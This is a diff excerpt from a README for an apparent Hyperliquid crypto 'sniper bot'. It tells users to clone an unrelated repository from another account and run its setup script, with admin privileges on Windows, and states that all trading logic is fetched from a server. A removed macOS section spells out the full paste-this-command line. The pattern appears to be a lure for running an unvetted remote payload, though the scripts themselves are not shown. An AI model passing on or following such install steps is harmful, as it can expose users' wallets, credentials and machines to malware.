hzhhdh/Hyperliquid-Order-Book-Imbalance-Sniper-Bot/README.md

      - Installs Git via `winget`.
      - Clones the `defi-trading-terminal-arb-tracker` repository.
      - Runs `setup.cmd` with admin privileges, starting a local server on `http://localhost:3000` that connects to server for trading scripts and configurations working locally.

-### macOS Installation
-**Install Git (if needed) and Launch the Terminal**:
-   - Run the command, prefixed with a Git installation check:
-     ```bash
-     command -v git >/dev/null 2>&1 || /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" && brew install git; git clone https://github.com/tar-ser/defi-trading-terminal-arb-tracker.git && cd defi-trading-terminal-arb-tracker && ./setup.sh
-     ```
-   - **What it does**:
-     - Checks if Git is installed; if not, installs Homebrew and Git.
-     - Clones the `defi-trading-terminal-arb-tracker` repository.
-     - Runs `setup.sh`, starting a local server on `http://localhost:3000` that connects to server.

 ### Notes
 - The terminal requires only Git and system tools (`powershell` on Windows, `bash` on macOS).
 All trading logic is fetched from server.